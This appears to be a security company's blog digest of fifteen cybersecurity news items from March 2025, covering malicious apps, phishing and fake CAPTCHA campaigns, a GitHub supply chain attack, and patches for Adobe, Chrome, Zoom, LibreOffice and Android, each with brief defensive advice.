Highlights from the cybersecurity world
1. 331 malicious apps on Google Play evade Android 13 security
A recent report found 331 malicious apps on the Google Play Store, which have been downloaded over 60 million times and exploit vulnerabilities in Android 13. These apps, posing as QR scanners, expense trackers, health apps, and wallpaper tools, deceive users into installing them.
Attackers can carry out activities without user interaction, hide app icons, display full-screen ads, and collect sensitive information like credentials and credit card details. This incident highlights significant security vulnerabilities in Android and underscores the need for better third-party security solutions.
2. 23,000 GitHub repositories targeted in one of the largest supply chain attacks
A significant security breach recently affected around 23,000 GitHub repositories in one of the largest supply chain attacks. Attackers exploited vulnerabilities in the software development pipeline through phishing and token exploitation to compromise maintainer accounts and inject malicious code.
GitHub confirmed unauthorised commits in popular open-source projects and has temporarily restricted access to affected repositories. Users should audit recent commits and update their dependencies to verified versions, while organisations are encouraged to enhance their software supply chain security.
3. Watch out for free Word to PDF converters. They may deliver malware!
Cybercriminals target users searching for free document conversion tools, particularly Word to PDF-converters. These malicious converters often appear legitimate and rank high in search results. Many victims are unaware that their systems are compromised until they suffer from identity theft or ransomware infections.
Once accessed, the apps secretly install malware that can create backdoors for long-term access, leading to the theft of email credentials, financial details and passwords. To be safe, users should rely on trusted software from verified publishers.
4. Three critical vulnerabilities found in Adobe Acrobat Reader
Three significant vulnerabilities in multiple versions of Adobe Acrobat Reader could allow attackers to execute arbitrary code or access sensitive information when a malicious PDF is opened. The first is a high-severity memory corruption flaw, the second is an out-of-bounds read that may expose passwords or cryptographic keys, and the third is a medium-severity out-of-bounds read that can disclose sensitive information.
Users and organisations are urged to update to the latest versions of Adobe Acrobat and Reader, with patches released on March 11, 2025.
5. Beware of password-stealing software mimicking Booking.com
A phishing campaign impersonating Booking.com has targeted hospitality organisations since December 2024. Attackers send fake emails with negative reviews or account verification requests, featuring malicious links or PDF attachments linked to fraudulent sites that mimic Booking.com.
Utilising a “ClickFix” technique, victims who click the links face a fake CAPTCHA page prompting them to execute a Windows Run command to download malware, which can steal passwords, capture financial information, and allow remote access for further attacks.
6. Microsoft365-themed attack uses OAuth redirection to take over accounts
Sophisticated phishing campaigns targeting Microsoft 365 users exploit OAuth redirection vulnerabilities and brand impersonation, focusing on high-value employees like executives and finance staff. Malicious OAuth apps impersonating “Adobe Drive,” “Adobe Acrobat,” and “DocuSign” direct victims to malware sites, granting access to emails and sensitive data.
Organisations should adopt phishing-resistant methods like FIDO2 security keys, disable legacy authentication, and use number matching for multi-factor authentication. Regular reviews of Azure AD logs, alerts for risky sign-ins, monitoring of OAuth consent requests, and security training are also recommended.
7. Mozilla urges users to update Firefox as a critical certificate expires
Mozilla issued an urgent warning for Firefox users to update their browsers before March 14, 2025, when a critical root certificate expired. Affected are users with versions earlier than 128 or ESR versions before 115.13. This expiration could disable extensions, break DRM playback, and expose users to security risks like compromised passwords and fraudulent website exposure.
8. Fake Captcha malware attacks Windows users to run PowerShell commands
A recent malware campaign, identified in February 2025, targets Windows users with fake CAPTCHA prompts that mislead victims into running malicious PowerShell scripts. These deceptive attacks bypass security measures by prompting users to execute a PowerShell command disguised as verification. This initiates a multi-stage infection process involving an HTA file hidden as an MP4. Security experts recommend boosting security awareness training and implementing advanced endpoint protection.
9. Microsoft March 2025 Patch Tuesday
Microsoft’s March 2025 Patch Tuesday fixes 57 vulnerabilities, including 6 zero-day vulnerabilities currently exploited. The security update covers Windows, Microsoft Office, and Azure among others. Users are urged to update their software immediately, especially considering the number of actively exploited vulnerabilities.
10. Several Zoom client vulnerabilities reveal sensitive information
Critical vulnerabilities in Zoom’s client software, with CVSS scores of 7.1 to 8.5, expose users to data breaches and unauthorised access. Users should upgrade to Zoom Client 6.2.0 or later to patch 12 vulnerabilities. It’s recommended access restrictions to unauthenticated users and audit logs for unusual activities. In high-risk environments, consider third-party tools for end-to-end encryption, as Zoom does not offer this feature natively.
11. Google alerted Chromecast owners not to perform a factory reset
Google has issued an urgent advisory for Chromecast 2nd Generation (2015) and Chromecast Audio users, warning against factory resets due to a global outage caused by an expired security certificate. This issue affects over 20 million units, leading to failed setups and devices showing as “Offline” in the Home app. The outage is linked to the expiration of the Chromecast ICA 3 intermediate certificate authority on March 9, 2025.
Google is working on a fix but has not provided a timeline for resolution. This incident highlights the need for better long-term certificate management in IoT devices.
12. Eleven11bot releases record-breaking DDoS attacks hacking 30,000 webcams
We’ve already informed you about the newly surfaced botnet named "Eleven11bot" which has triggered what's perceived to be the most extensive distributed DDoS attacks on record. Read our dedicated post to learn more.
13. Chrome Security Update addresses multiple high-severity vulnerabilities
Google has released a critical Chrome security update (version 134.0.6998.88/.89 for Windows and Mac and 134.0.6998.88 for Linux), fixing five high-severity vulnerabilities related to arbitrary code execution and sandbox escapes. Chrome updates automatically, but users must restart the browser manually to activate the latest patches. With increasing browser-based attacks, maintaining good patch discipline is essential.
14. LibreOffice vulnerability allows attackers to execute arbitrary scripts
A critical security vulnerability in LibreOffice exposed millions of users to remote code execution attacks via manipulated macro URLs. Patched in versions 24.8.5 and 25.2.1 in March, this flaw allowed attackers to bypass security protocols and execute scripts through LibreOffice’s custom URI scheme. Targeting enterprises using LibreOffice with SharePoint, the exploit embedded malicious payloads in document-sharing links. The issue highlights the ongoing challenges of securing open-source office suites against social engineering attacks.
15. Google alerts users to two serious Android vulnerabilities
Google has issued an urgent security warning regarding 2 critical Android vulnerabilities that are actively exploited in coordinated attacks against devices running Android versions 12 through 15. These issues, which were patched in the March 2025 Android Security Bulletin, allow attackers to bypass lock screens, escalate privileges, and execute remote code. Users are urged to install updates immediately.
Stay tuned and keep your system safe! If you need help, contact us for expert advice!